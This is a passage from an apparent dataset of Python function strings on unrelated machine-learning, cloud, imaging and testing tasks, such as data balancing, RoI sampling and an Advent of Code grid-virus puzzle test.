ratio=0.1):\r\n train_set, train_set_target = load_data()\r\n \r\n # binarize\r\n mask_train_set_imb = np.logical_or(train_set_target == classes[0],train_set_target == classes[1])\r\n (data_set_imb,data_set_imb_target)= (train_set[mask_train_set_imb], train_set_target[mask_train_set_imb])\r\n\r\n # imbalance\r\n data_minority = data_set_imb[data_set_imb_target == classes[1]]\r\n data_minority_target = data_set_imb_target[data_set_imb_target == classes[1]]\r\n data_majority = data_set_imb[data_set_imb_target == classes[0]]\r\n data_majority_target = data_set_imb_target[data_set_imb_target == classes[0]]\r\n original_size = data_minority_target.shape[0]\r\n majority_size = data_majority_target.shape[0]\r\n target_size = int(np.floor(majority_size * ratio))\r\n indices = np.random.choice(original_size, size=target_size)\r\n data_minority = data_minority[indices]\r\n data_minority_target = data_minority_target[indices]\r\n\r\n # merge\r\n train_set = np.concatenate([data_minority, data_majority])\r\n train_set_target = np.concatenate([data_minority_target, data_majority_target])\r\n\r\n #shuffle\r\n train_set, 
train_set_target = np.hsplit(\r\n np.random.permutation(\r\n np.hstack((train_set, train_set_target.reshape((train_set_target.shape[0], 1))))\r\n ), [-1]\r\n )\r\n train_set_target = np.asarray(train_set_target, dtype='int').reshape((train_set_target.shape[0],))\r\n return (train_set[:],train_set_target[:])", "def split_train_test_classifier(self, split_method, method):\n \n # split data balance based on user and act (if provided)\n if method == 'window_based':\n data_train, data_val, label_user_train, label_user_val, id_window_train, id_window_val = self.split_train_val_classifier(\n self.classifier['data'], self.classifier['user_label'], self.classifier['act_label'], self.classifier['id'], 'standard', train_size=0.9) \n\n print(f'Train window before delete overlap sequence: {data_train.shape[0]}')\n\n # delete overlap sequence\n if self.overlap != 0:\n if self.overlap == 0.5:\n distance_to_delete = [1]\n elif self.overlap == 0.75:\n distance_to_delete = [1,2,3]\n invalid_idx = delete_overlap(id_window_train, id_window_val, distance_to_delete)\n data_train = np.delete(data_train, invalid_idx, axis=0)\n label_user_train = np.delete(label_user_train, invalid_idx, axis=0)\n\n print(f'Train window after delete overlap sequence: {data_train.shape[0]}')\n print(f'Validation set: {data_val.shape[0]}')\n \n elif method == 'cycle_based':\n data_train, data_val, label_user_train, label_user_val = self.split_train_val_classifier(\n self.classifier['data'], self.classifier['user_label'], self.classifier['act_label'], None, split_method, train_size=0.9) \n\n self.train = data_train\n self.train_user = label_user_train\n self.val = data_val\n self.val_user = label_user_val", "def ior_write_dataset(self):\n for oclass in self.obj_class:\n for sizes in self.ior_chu_trs_blk_size:\n # Skip the object type if server count does not meet the minimum\n # EC object server count\n if oclass[1] > self.server_count:\n continue\n self.ior_param_update(oclass, sizes)\n\n # Create the new container with correct redundancy factor\n # for EC object type\n self.ec_contaier_create(oclass[0])\n self.update_ior_cmd_with_pool(oclass=oclass[0],\n create_cont=False)\n # Start IOR Write\n self.container.uuid = self.ec_container.uuid\n self.start_ior_load(operation=\"WriteRead\", percent=1,\n create_cont=False)\n self.cont_uuid.append(self.ior_cmd.dfs_cont.value)", "def balance(labels):\n # subsample positive labels if we have too many\n labels = subsample_positive_labels(labels)\n\n # subsample negative labels if we have too many\n labels = subsample_negative_labels(labels)\n\n return labels", "def test_re_balance(self):\n shards = []\n control_table_item_list = []\n kinesis_ramp1 = self.get_kinesis_ramp()\n kinesis_ramp2 = self.get_kinesis_ramp()\n kinesis_ramp3 = self.get_kinesis_ramp()\n worker_id = kinesis_ramp1.worker_id\n for i in range(1, 11):\n shard_id = \"shard-%s\" % str(i)\n shards.append(shard_id)\n if i == 11:\n # leave one shard to be claimed\n continue\n if i == 4:\n worker_id = kinesis_ramp2.worker_id\n elif i == 7:\n worker_id = kinesis_ramp3.worker_id\n # assign each worker 3 shards\n control_table_item_list.append(MockDynamoItem(\n shard_id=shard_id,\n checkpoint=0,\n worker_id=worker_id,\n heartbeat=0,\n ))\n table = MockControlTable(control_table_item_list) # create a shared control table\n\n kinesis_ramp1.control_table = table\n kinesis_ramp2.control_table = table\n kinesis_ramp3.control_table = table\n\n def change_heartbeat(seconds):\n for j in range(1, 10):\n # change the first nines heartbeat to 
exclude them from rebalancing\n table.get_item(Key={'shard_id': 'shard-%s' % j})['Item']['heartbeat'] += 1\n\n with patch('time.sleep', change_heartbeat) as mock_method:\n self.assertTrue(kinesis_ramp1.can_claim_shard(\"shard-10\"))\n self.assertTrue(kinesis_ramp1.claim_shard(\"shard-10\"))\n\n def change_heartbeat10(seconds):\n for j in range(1, 11):\n # change the heartbeat for all shards so no workers seems idle\n table.get_item(Key={'shard_id': 'shard-%s' % j})['Item']['heartbeat'] += 1\n\n with patch('time.sleep', change_heartbeat10) as mock_method:\n # we should not be able to claim shard 10 since we have a optimal distribution of 3,3,4 and no workers are marked as idle\n self.assertFalse(kinesis_ramp2.can_claim_shard(\"shard-10\"))", "def test_ipam_rirs_update(self):\n pass", "def reserved_compare(options):\n running_instances = defaultdict(dict)\n reserved_purchases = defaultdict(dict)\n regions = boto.ec2.regions()\n good_regions = [r for r in regions if r.name not in ['us-gov-west-1',\n 'cn-north-1']]\n for region in good_regions:\n if options.trace:\n print \" Scanning region {0}\".format(region.name)\n conn = region.connect()\n filters = {'instance-state-name': 'running'}\n zones = defaultdict(dict)\n\n if options.trace:\n print \" Fetching running instances\"\n reservations = conn.get_all_instances(filters=filters)\n for reservation in reservations:\n for inst in reservation.instances:\n if options.debug:\n print instance_string(inst, options, verbose=True)\n if inst.state != 'running':\n if options.debug:\n print \"Skip {0.id} state {0.state}\".format(inst)\n continue\n if inst.spot_instance_request_id:\n if options.debug:\n print \"Skip {0.id} has spot id {0.spot_instance_request_id}\".format(inst)\n continue\n if 'aws:autoscaling:groupName' in inst.tags:\n if options.debug:\n print \"Skip {0.id} is an autoscale instance\".format(inst)\n continue\n if inst.platform == 'Windows' or inst.platform == 'windows':\n if options.debug:\n print \"Skip {0.id} has platform {0.platform}\".format(inst)\n continue\n if inst.instance_type not in zones[inst.placement]:\n zones[inst.placement][inst.instance_type] = []\n zones[inst.placement][inst.instance_type].append(inst)\n\n if zones:\n running_instances[region.name] = zones\n\n purchased = defaultdict(dict)\n if options.trace:\n print \" Fetching reservations\"\n\n reserved = conn.get_all_reserved_instances()\n for r in reserved:\n if options.debug:\n print reservation_string(r, verbose=True)\n if r.state != 'active':\n continue\n if r.instance_tenancy != 'default':\n print 'WARNING: Non-default tenancy %s: %s' % (r.instance_tenancy, reservation_string(r))\n continue\n if r.instance_type not in purchased[r.availability_zone]:\n purchased[r.availability_zone][r.instance_type] = [r]\n else:\n purchased[r.availability_zone][r.instance_type].append(r)\n\n if purchased:\n reserved_purchases[region.name] = purchased\n\n return check_reservation_use(options, running_instances,\n reserved_purchases)", "def white_balance(device, img, mode='hist',debug=None, roi=None):\n device += 1\n\n ori_img = np.copy(img)\n\n if roi is not None:\n roiint = all(isinstance(item, int) for item in roi)\n\n if len(roi) != 4 | roiint is False:\n fatal_error('If ROI is used ROI must have 4 elements as a list and all must be integers')\n else:\n pass\n\n if len(np.shape(img)) == 3:\n iy, ix, iz = np.shape(img)\n hmax=255\n type = np.uint8\n else:\n iy, ix = np.shape(img)\n if img.dtype == 'uint8':\n hmax=255\n type=np.uint8\n elif img.dtype == 'uint16':\n hmax=65536\n 
type=np.uint16\n\n mask = np.zeros((iy, ix, 3), dtype=np.uint8)\n\n if roi is None:\n x = 0\n y = 0\n w = ix\n h = iy\n\n else:\n x = roi[0]\n y = roi[1]\n w = roi[2]\n h = roi[3]\n\n if len(np.shape(img)) == 3:\n cv2.rectangle(ori_img, (x, y), (x + w, y + h), (0, 255, 0), 3)\n c1 = img[:, :, 0]\n c2 = img[:, :, 1]\n c3 = img[:, :, 2]\n if mode == 'hist':\n channel1 = _hist(c1, hmax, x, y, h, w, type)\n channel2 = _hist(c2, hmax, x, y, h, w, type)\n channel3 = _hist(c3, hmax, x, y, h, w, type)\n else:\n channel1 = _max(c1, hmax, mask, x, y, h, w, type)\n channel2 = _max(c2, hmax, mask, x, y, h, w, type)\n channel3 = _max(c3, hmax, mask, x, y, h, w, type)\n\n finalcorrected = np.dstack((channel1, channel2, channel3))\n\n else:\n cv2.rectangle(ori_img, (x, y), (x + w, y + h), (255, 255, 255), 3)\n if mode == 'hist':\n finalcorrected = _hist(img, hmax, x, y, h, w, type)\n elif mode == 'max':\n finalcorrected = _max(img, hmax, mask, x, y, h, w, type)\n\n if debug == 'print':\n print_image(ori_img, (str(device) + '_whitebalance_roi.png'))\n print_image(finalcorrected, (str(device) + '_whitebalance.png'))\n\n elif debug == 'plot':\n plot_image(ori_img, cmap='gray')\n plot_image(finalcorrected, cmap='gray')\n\n return device, finalcorrected", "def create_all_households(rel_poi_df, subsectie=None):\n # Identify households that are in areas for centralized rest collection\n polygon_list = load_geodata_containers(subsectie=subsectie)\n all_households = rel_poi_df[rel_poi_df['type'] != 'afval_cluster']\n all_households = all_households[['s1_afv_nodes', 'cluster_x', 'cluster_y']]\n all_households['uses_container'] = all_households\\\n .apply(lambda row: address_in_service_area(row['cluster_x'],\n row['cluster_y'],\n polygon_list=polygon_list),\n axis=1)\n\n # Identify households that are in areas where cardboard is collected\n wijken = gpd.read_file('../data/brtk2010_ind2005_region.shp')\n polygons_list = list(wijken.iloc[[49, 185, 307, 311, 328]]['geometry'])\n all_households['collect_cardboard'] = all_households.\\\n apply(lambda row: address_in_service_area(row['cluster_x'],\n row['cluster_y'],\n polygon_list=polygons_list),\n axis=1)\n\n # Identify households that are in Landelijk Noord to exclude\n polygons_list = list(wijken[wijken['BC'] == '73']['geometry'])\n all_households['in_landelijk_noord'] = all_households.\\\n apply(lambda row: address_in_service_area(row['cluster_x'],\n row['cluster_y'],\n polygon_list=polygons_list),\n axis=1)\n\n # Exclude all households in stadsdeel centrum because of inconsistent data\n polygons_list = list(wijken[wijken['SD09'] == 'A']['geometry'])\n all_households['in_centrum'] = all_households.\\\n apply(lambda row: address_in_service_area(row['cluster_x'],\n row['cluster_y'],\n polygon_list=polygons_list),\n axis=1)\n\n # Identify all households that are in specified area\n neighborhood_list = load_shapefile_neighborhood(area=subsectie)\n all_households['in_neigborhood'] = all_households\\\n .apply(lambda row:\n address_in_service_area(row['cluster_x'], row['cluster_y'],\n polygon_list=neighborhood_list),\n axis=1)\n\n return all_households", "def _cluster(self):\n self._not_included = self.data\n self.leaves = []\n flag = int(rand() * len(self.data))\n flag = self._generate(flag)\n while len(self._not_included) > 0:\n flag = self._generate(flag)\n if flag == -1:\n break\n pass\n self._remember.append({\n 'threshold': self._base_threshold,\n 'result': len(self.leaves)\n })\n print(len(self._remember), {\n 'threshold': self._base_threshold,\n 'result': 
len(self.leaves)\n })\n return", "def computeRmse(model, data, n , sc):\n truth = data.map( lambda x: ((x[0], x[1]), x[2]) )\n truth.cache()\n ##print 'test zhou 0.....', truth.count() , '............', truth.take(10)\n\n predictions = model.predictAll(data.map(lambda x: (x[0], x[1])))\n predictions.cache()\n # here let's rescale predicted ratings to 0-10 scale\n maxPrediction = predictions.map(lambda x: x[2]).max()\n minPrediction = predictions.map(lambda x: x[2]).min()\n maxRate = RatingScale\n minRate = RatingScaleMin\n ##print 'test zhou 1......', predictions.count(), '............', predictions.take(10)\n\n #predictionsAndRatings = predictions.map(lambda x: ((x[0], x[1]), (x[2]-minPrediction)/(maxPrediction-minPrediction)*(maxRate-minRate)+minRate )).join(data.map(lambda x: ((x[0], x[1]), x[2]))).values()\n\n\n #predictedRating = predictions.map(lambda x: ((x[0], x[1]), (x[2]-minPrediction)/(maxPrediction-minPrediction)*(maxRate-minRate)+minRate ) )\n predictedRating = predictions.map(lambda x: ((x[0], x[1]), x[2] ) )\n predictedRating.cache()\n ##predictedRating.checkpoint()\n ##print 'test zhou 2.......', predictedRating.count(), '............', predictedRating.take(10)\n\n\n \n\n\n predictionsAndRatings = predictedRating.join(truth).values()\n #predictionsAndRatings = sc.union(predictedRating, truth)\n predictionsAndRatings.cache()\n #print 'test zhou 3........', predictionsAndRatings.count(), '............', predictionsAndRatings.take(10)\n #predictionsAndRatings = predictions.map(lambda x: ((x[0], x[1]), x[2])).join(data.map(lambda x: ((x[0], x[1]), x[2]))).values()\n \n return sqrt(predictionsAndRatings.map(lambda x: (x[0] - x[1]) ** 2).reduce(add) / float(n))\n #return 1.0", "def calculate_metrics(self, metric_df, dose):\n # Prepare to iterate through all rois\n roi_exists = self.roi_mask.max(axis=(0, 1, 2))\n voxels_in_tenth_of_cc = np.maximum(1, np.round(100/self.voxel_size)) #\n for roi_idx, roi in enumerate(self.data_loader.full_roi_list):\n if roi_exists[roi_idx]:\n roi_mask = self.roi_mask[:, :, :, roi_idx].flatten()\n roi_dose = dose[roi_mask]\n roi_size = len(roi_dose)\n if roi in self.data_loader.rois['oars']:\n if 'D_0.1_cc' in self.oar_eval_metrics:\n # Find the fractional volume in 0.1cc to evaluate percentile\n fractional_volume_to_evaluate = 100 - voxels_in_tenth_of_cc/roi_size * 100\n metric_eval = np.percentile(roi_dose, fractional_volume_to_evaluate)\n metric_df.at[self.patient_list[0], ('D_0.1_cc', roi)] = metric_eval\n if 'mean' in self.oar_eval_metrics:\n metric_eval = roi_dose.mean()\n metric_df.at[self.patient_list[0], ('mean', roi)] = metric_eval\n elif roi in self.data_loader.rois['targets']:\n if 'D_99' in self.tar_eval_metrics:\n metric_eval = np.percentile(roi_dose, 1)\n metric_df.at[self.patient_list[0], ('D_99', roi)] = metric_eval\n if 'D_95' in self.tar_eval_metrics:\n metric_eval = np.percentile(roi_dose, 5)\n metric_df.at[self.patient_list[0], ('D_95', roi)] = metric_eval\n if 'D_1' in self.tar_eval_metrics:\n metric_eval = np.percentile(roi_dose, 99)\n metric_df.at[self.patient_list[0], ('D_1', roi)] = metric_eval\n\n return metric_df", "def rebalance_weightings(context):\r\n total_ratio = 0\r\n log.info(\"*******Rebalancing weightings********\")\r\n print(context.up_ratios)\r\n \r\n for asset, ratio in context.up_ratios.items():\r\n total_ratio += ratio\r\n \r\n for asset, ratio in context.up_ratios.items():\r\n context.max_weights[asset] = ratio/total_ratio\r\n \r\n log.info(context.max_weights)", "def run(self):\n for i,p in 
enumerate(self.pairs):\n self.forPointPair(i)\n if i % 100000 == 0:\n print('Percentage Processed: ' + str(round(i * 100 / len(self.pairs), 3)) + '. Existing Cluster Labels: ', len(np.unique(self.labels)))", "def _sample_rois(all_rois, all_scores, gt_boxes, fg_rois_per_image, rois_per_image, num_classes):\n # overlaps: (rois x gt_boxes)\n overlaps = bbox_overlaps(\n np.ascontiguousarray(all_rois[:, 1:5], dtype=np.float),\n np.ascontiguousarray(gt_boxes[:, :4], dtype=np.float))\n gt_assignment = overlaps.argmax(axis=1)\n max_overlaps = overlaps.max(axis=1)\n labels = gt_boxes[gt_assignment, 4]\n\n # Select foreground RoIs as those with >= FG_THRESH overlap\n fg_inds = np.where(max_overlaps >= cfg.TRAIN.FG_THRESH)[0]\n # Guard against the case when an image has fewer than fg_rois_per_image\n # Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)\n bg_inds = np.where((max_overlaps < cfg.TRAIN.BG_THRESH_HI) &\n (max_overlaps >= cfg.TRAIN.BG_THRESH_LO))[0]\n\n # Small modification to the original version where we ensure a fixed number of regions are sampled\n if fg_inds.size > 0 and bg_inds.size > 0:\n fg_rois_per_image = min(fg_rois_per_image, fg_inds.size)\n fg_inds = npr.choice(fg_inds, size=int(fg_rois_per_image), replace=False)\n bg_rois_per_image = rois_per_image - fg_rois_per_image\n to_replace = bg_inds.size < bg_rois_per_image\n bg_inds = npr.choice(bg_inds, size=int(bg_rois_per_image), replace=to_replace)\n elif fg_inds.size > 0:\n to_replace = fg_inds.size < rois_per_image\n fg_inds = npr.choice(fg_inds, size=int(rois_per_image), replace=to_replace)\n fg_rois_per_image = rois_per_image\n elif bg_inds.size > 0:\n to_replace = bg_inds.size < rois_per_image\n bg_inds = npr.choice(bg_inds, size=int(rois_per_image), replace=to_replace)\n fg_rois_per_image = 0\n else:\n import pdb\n pdb.set_trace()\n\n # The indices that we're selecting (both fg and bg)\n keep_inds = np.append(fg_inds, bg_inds)\n # Select sampled values from various arrays:\n labels = labels[keep_inds]\n # Clamp labels for the background RoIs to 0\n labels[int(fg_rois_per_image):] = 0\n rois = all_rois[keep_inds]\n roi_scores = all_scores[keep_inds]\n\n bbox_target_data = _compute_targets(\n rois[:, 1:5], gt_boxes[gt_assignment[keep_inds], :4], labels)\n\n bbox_targets, bbox_inside_weights = \\\n _get_bbox_regression_labels(bbox_target_data, num_classes)\n\n return labels, rois, roi_scores, bbox_targets, bbox_inside_weights", "def binarize(self):\n total = 0\n count = 0\n avg_rating = 0\n for movie_id, movie in enumerate(self.ratings):\n for user_id, rating in enumerate(movie):\n if rating != 0:\n self.ratings[movie_id,user_id] = 1 if rating > 2.5 else -1", "def test_binary_compare(self):\n dataset = make_fixture(binary=True, split=True)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y.train, dataset.y.test) is oz\n assert oz._mode == COMPARE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def occupation_distribution(data):", "def read_roi_data(self) -> None:\n\n if not os.path.isfile(self.roi_coordinates_path):\n raise NoROIDataError(\n msg=\"SIMBA ERROR: No ROI definitions were found in your SimBA project. 
Please draw some ROIs before analyzing your ROI data\"\n )\n else:\n self.rectangles_df = pd.read_hdf(\n self.roi_coordinates_path, key=Keys.ROI_RECTANGLES.value\n ).dropna(how=\"any\")\n self.circles_df = pd.read_hdf(\n self.roi_coordinates_path, key=Keys.ROI_CIRCLES.value\n ).dropna(how=\"any\")\n self.polygon_df = pd.read_hdf(\n self.roi_coordinates_path, key=Keys.ROI_POLYGONS.value\n )\n if \"Center_XCenter_Y\" in self.polygon_df.columns:\n self.polygon_df = self.polygon_df.drop([\"Center_XCenter_Y\"], axis=1)\n self.polygon_df = self.polygon_df.dropna(how=\"any\")\n self.shape_names = list(\n itertools.chain(\n self.rectangles_df[\"Name\"].unique(),\n self.circles_df[\"Name\"].unique(),\n self.polygon_df[\"Name\"].unique(),\n )\n )\n self.roi_dict = {\n Keys.ROI_RECTANGLES.value: self.rectangles_df,\n Keys.ROI_CIRCLES.value: self.circles_df,\n Keys.ROI_POLYGONS.value: self.polygon_df,\n }\n self.roi_types_names_lst = set()\n for idx, r in self.roi_dict[Keys.ROI_RECTANGLES.value].iterrows():\n self.roi_types_names_lst.add(f'Rectangle: {r[\"Name\"]}')\n for idx, r in self.roi_dict[Keys.ROI_CIRCLES.value].iterrows():\n self.roi_types_names_lst.add(f'Circle: {r[\"Name\"]}')\n for idx, r in self.roi_dict[Keys.ROI_POLYGONS.value].iterrows():\n self.roi_types_names_lst.add(f'Polygon: {r[\"Name\"]}')\n self.roi_types_names_lst = list(self.roi_types_names_lst)\n for shape_type, shape_data in self.roi_dict.items():\n if shape_type == Keys.ROI_CIRCLES.value:\n self.roi_dict[Keys.ROI_CIRCLES.value][\"Center_X\"] = self.roi_dict[\n Keys.ROI_CIRCLES.value\n ][\"centerX\"]\n self.roi_dict[Keys.ROI_CIRCLES.value][\"Center_Y\"] = self.roi_dict[\n Keys.ROI_CIRCLES.value\n ][\"centerY\"]\n elif shape_type == Keys.ROI_RECTANGLES.value:\n self.roi_dict[Keys.ROI_RECTANGLES.value][\n \"Center_X\"\n ] = self.roi_dict[Keys.ROI_RECTANGLES.value][\"Bottom_right_X\"] - (\n (\n self.roi_dict[Keys.ROI_RECTANGLES.value][\"Bottom_right_X\"]\n - self.roi_dict[Keys.ROI_RECTANGLES.value][\"width\"]\n )\n / 2\n )\n self.roi_dict[Keys.ROI_RECTANGLES.value][\n \"Center_Y\"\n ] = self.roi_dict[Keys.ROI_RECTANGLES.value][\"Bottom_right_Y\"] - (\n (\n self.roi_dict[Keys.ROI_RECTANGLES.value][\"Bottom_right_Y\"]\n - self.roi_dict[Keys.ROI_RECTANGLES.value][\"height\"]\n )\n / 2\n )\n elif shape_type == Keys.ROI_POLYGONS.value:\n self.roi_dict[Keys.ROI_POLYGONS.value][\"Center_X\"] = self.roi_dict[\n Keys.ROI_POLYGONS.value\n ][\"Center_X\"]\n self.roi_dict[Keys.ROI_POLYGONS.value][\"Center_Y\"] = self.roi_dict[\n Keys.ROI_POLYGONS.value\n ][\"Center_Y\"]", "def remerge_subset():\n import wbia\n\n ibs1 = wbia.opendb('PZ_PB_RF_TRAIN')\n ibs2 = wbia.opendb('PZ_Master1')\n\n gids1, gids2 = ibs1.images(), ibs2.images()\n idxs1, idxs2 = ut.isect_indices(gids1.uuids, gids2.uuids)\n isect_gids1, isect_gids2 = gids1.take(idxs1), gids2.take(idxs2)\n\n assert all(\n set.issubset(set(a1), set(a2))\n for a1, a2 in zip(isect_gids1.annot_uuids, isect_gids2.annot_uuids)\n )\n\n annot_uuids = ut.flatten(isect_gids1.annot_uuids)\n # aids1 = ibs1.annots(ibs1.get_annot_aids_from_uuid(annot_uuids), asarray=True)\n # aids2 = ibs2.annots(ibs2.get_annot_aids_from_uuid(annot_uuids), asarray=True)\n aids1 = ibs1.annots(uuids=annot_uuids, asarray=True)\n aids2 = ibs2.annots(uuids=annot_uuids, asarray=True)\n import numpy as np\n\n to_aids2 = dict(zip(aids1, aids2))\n # to_aids1 = dict(zip(aids2, aids1))\n\n # Step 1) Update individual annot properties\n # These annots need updates\n # np.where(aids1.visual_uuids != aids2.visual_uuids)\n # 
np.where(aids1.semantic_uuids != aids2.semantic_uuids)\n\n annot_unary_props = [\n # 'yaws', 'bboxes', 'thetas', 'qual', 'species', 'unary_tags']\n 'yaws',\n 'bboxes',\n 'thetas',\n 'qual',\n 'species',\n 'case_tags',\n 'multiple',\n 'age_months_est_max',\n 'age_months_est_min', # 'sex_texts'\n ]\n to_change = {}\n for key in annot_unary_props:\n prop1 = getattr(aids1, key)\n prop2 = getattr(aids2, key)\n diff_idxs = set(np.where(prop1 != prop2)[0])\n if diff_idxs:\n diff_prop1 = ut.take(prop1, diff_idxs)\n diff_prop2 = ut.take(prop2, diff_idxs)\n logger.info('key = {!r}'.format(key))\n logger.info('diff_prop1 = {!r}'.format(diff_prop1))\n logger.info('diff_prop2 = {!r}'.format(diff_prop2))\n to_change[key] = diff_idxs\n if to_change:\n changed_idxs = ut.unique(ut.flatten(to_change.values()))\n logger.info('Found %d annots that need updated properties' % len(changed_idxs))\n logger.info('changing unary attributes: {!r}'.format(to_change))\n if False and ut.are_you_sure('apply change'):\n for key, idxs in to_change.items():\n subaids1 = aids1.take(idxs)\n subaids2 = aids2.take(idxs)\n prop1 = getattr(subaids1, key)\n # prop2 = getattr(subaids2, key)\n setattr(subaids2, key, prop1)\n else:\n logger.info('Annot properties are in sync. Nothing to change')\n\n # Step 2) Update annotmatch - pairwise relationships\n infr1 = wbia.AnnotInference(aids=aids1.aids, ibs=ibs1, verbose=3, autoinit=False)\n\n # infr2 = wbia.AnnotInference(aids=ibs2.annots().aids, ibs=ibs2, verbose=3)\n aids2 = ibs2.get_valid_aids(is_known=True)\n infr2 = wbia.AnnotInference(aids=aids2, ibs=ibs2, verbose=3)\n infr2.reset_feedback('annotmatch', apply=True)\n\n # map feedback from ibs1 onto ibs2 using ibs2 aids.\n fb1 = infr1.read_wbia_annotmatch_feedback()\n fb1_t = {(to_aids2[u], to_aids2[v]): val for (u, v), val in fb1.items()}\n fb1_df_t = infr2._pandas_feedback_format(fb1_t).drop('am_rowid', axis=1)\n\n # Add transformed feedback into ibs2\n infr2.add_feedback_from(fb1_df_t)\n\n # Now ensure that dummy connectivity exists to preserve origninal names\n # from wbia.algo.graph import nx_utils\n # for (u, v) in infr2.find_mst_edges('name_label'):\n # infr2.draw_aids((u, v))\n # cc1 = infr2.pos_graph.connected_to(u)\n # cc2 = infr2.pos_graph.connected_to(v)\n # logger.info(nx_utils.edges_cross(infr2.graph, cc1, cc2))\n # infr2.neg_redundancy(cc1, cc2)\n # infr2.pos_redundancy(cc2)\n\n infr2.relabel_using_reviews(rectify=True)\n infr2.apply_nondynamic_update()\n\n if False:\n infr2.wbia_delta_info()\n infr2.wbia_name_group_delta_info()\n\n if len(list(infr2.inconsistent_components())) > 0:\n raise NotImplementedError('need to fix inconsistencies first')\n # Make it so it just loops until inconsistencies are resolved\n infr2.prioritize()\n infr2.qt_review_loop()\n else:\n infr2.write_wbia_staging_feedback()\n infr2.write_wbia_annotmatch_feedback()\n infr2.write_wbia_name_assignment()\n\n # if False:\n # # Fix any inconsistency\n # infr2.start_qt_interface(loop=False)\n # test_nodes = [5344, 5430, 5349, 5334, 5383, 2280, 2265, 2234, 5399,\n # 5338, 2654]\n # import networkx as nx\n # nx.is_connected(infr2.graph.subgraph(test_nodes))\n # # infr = wbia.AnnotInference(aids=test_nodes, ibs=ibs2, verbose=5)\n\n # # randomly sample some new labels to verify\n # import wbia.guitool as gt\n # from wbia.gui import inspect_gui\n # gt.ensure_qapp()\n # ut.qtensure()\n # old_groups = ut.group_items(name_delta.index.tolist(), name_delta['old_name'])\n # del old_groups['____']\n\n # new_groups = ut.group_items(name_delta.index.tolist(), 
name_delta['new_name'])\n\n # from wbia.algo.hots import simulate\n # c = simulate.compare_groups(\n # list(new_groups.values()),\n # list(old_groups.values()),\n # )\n # ut.map_vals(len, c)\n # for aids in c['pred_splits']:\n # old_nids = ibs2.get_annot_nids(aids)\n # new_nids = ut.take_column(infr2.gen_node_attrs('name_label', aids), 1)\n # split_aids = ut.take_column(ut.group_items(aids, new_nids).values(), 0)\n # aid1, aid2 = split_aids[0:2]\n\n # if False:\n # inspect_gui.show_vsone_tuner(ibs2, aid1, aid2)\n # infr2.start_qt_interface(loop=False)\n\n # if False:\n # # import wbia\n # ibs1 = wbia.opendb('PZ_PB_RF_TRAIN')\n # infr1 = wbia.AnnotInference(aids='all', ibs=ibs1, verbose=3)\n # infr1.initialize_graph()\n # # infr1.reset_feedback('staging')\n # infr1.reset_feedback('annotmatch')\n # infr1.apply_feedback_edges()\n # infr1.relabel_using_reviews()\n # infr1.apply_review_inference()\n # infr1.start_qt_interface(loop=False)\n # delta = infr2.match_state_delta()\n # logger.info('delta = %r' % (delta,))\n\n # infr2.ensure_mst()\n # infr2.relabel_using_reviews()\n # infr2.apply_review_inference()\n\n # mst_edges = infr2.find_mst_edges()\n # set(infr2.graph.edges()).intersection(mst_edges)\n\n return\n \"\"\"\n TODO:\n Task 2:\n Build AnnotInfr for ibs2 then add all decision from\n ibs1 to the internal feedback dict.\n\n Ensure that all other (esp old name-id related) edges are correctly\n placed, then overrite with new vals (\n make sure implicit vals do not cuase conflicts with new\n explicit vals, but old explicit vals should cause a conflict).\n Then just commit to staging and then commit to annotmatch and\n re-infer the names.\n \"\"\"\n\n # Print some info about the delta\n # def _to_tup(x):\n # return tuple(x) if isinstance(x, list) else x\n # changetype_list = list(zip(\n # delta['old_decision'], delta['new_decision'],\n # map(_to_tup, delta['old_tags']),\n # map(_to_tup, delta['new_tags'])))\n # changetype_hist = ut.dict_hist(changetype_list, ordered=True)\n # logger.info(ut.align(ut.repr4(changetype_hist), ':'))\n\n # import pandas as pd\n # pd.options.display.max_rows = 20\n # pd.options.display.max_columns = 40\n # pd.options.display.width = 160\n # pd.options.display.float_format = lambda x: '%.4f' % (x,)\n\n # a, b = 86, 6265\n # c, d = to_aids1[a], to_aids1[b]\n # inspect_gui.show_vsone_tuner(ibs2, a, b)\n # inspect_gui.show_vsone_tuner(ibs1, to_aids1[a], to_aids1[b])\n # am1 = ibs1.get_annotmatch_rowids_between([to_aids1[a]],\n # [to_aids1[b]])\n # am2 = ibs2.get_annotmatch_rowids_between([a], [b])\n # logger.info(ibs1.db.get_table_csv('annotmatch', rowids=am1))\n # logger.info(ibs2.db.get_table_csv('annotmatch', rowids=am2))\n\n # inspect_gui.show_vsone_tuner(ibs2, 8, 242)\n # inspect_gui.show_vsone_tuner(ibs2, 86, 103)\n # inspect_gui.show_vsone_tuner(ibs2, 86, 6265)", "def test_extreme_neighborhoods(self):\n\n ## Radius = 0 ==> all points are noise\n m = tc.dbscan.create(\n self.sf,\n distance=\"euclidean\",\n radius=0.0,\n min_core_neighbors=3,\n verbose=False,\n )\n\n self.assertEqual(m.num_clusters, 0)\n self.assertEqual(sum(m.cluster_id[\"type\"] == \"noise\"), self.n)\n\n ## Min_neighbors > 30 ==> all points are noise\n m = tc.dbscan.create(\n self.sf,\n distance=\"euclidean\",\n radius=0.0,\n min_core_neighbors=31,\n verbose=False,\n )\n\n self.assertEqual(m.num_clusters, 0)\n self.assertEqual(sum(m.cluster_id[\"type\"] == \"noise\"), self.n)\n\n ## Radius very large ==> all points are core points\n m = tc.dbscan.create(\n self.sf,\n distance=\"euclidean\",\n 
radius=100.0,\n min_core_neighbors=3,\n verbose=False,\n )\n\n self.assertEqual(m.num_clusters, 1)\n self.assertEqual(sum(m.cluster_id[\"type\"] == \"core\"), self.n)\n\n ## Min_neighbors = 0 ==> all points are core points\n m = tc.dbscan.create(\n self.sf,\n distance=\"euclidean\",\n radius=0.5,\n min_core_neighbors=0,\n verbose=False,\n )\n\n self.assertEqual(m.num_clusters, 1)\n self.assertEqual(sum(m.cluster_id[\"type\"] == \"core\"), self.n)", "def test_burst():\n print('\\nTesting burst()')\n cluster = p22.Cluster('..#\\n#..\\n...')\n assert cluster.infected[p22.Position(0, 2)] == p22.State.Infected\n assert cluster.infected[p22.Position(1, 0)] == p22.State.Infected\n assert cluster.infected[p22.Position(1, 1)] == p22.State.Clean\n cluster.burst()\n assert cluster.virus.direction == p22.Directions.left\n assert cluster.virus.pos == p22.Position(1,0)\n assert cluster.infected[p22.Position(1,1)] == p22.State.Infected\n assert cluster.infected[cluster.virus.pos] == p22.State.Infected\n prev_pos = cluster.virus.pos\n cluster.burst()\n assert cluster.virus.direction == p22.Directions.up # turned right\n assert cluster.virus.pos == 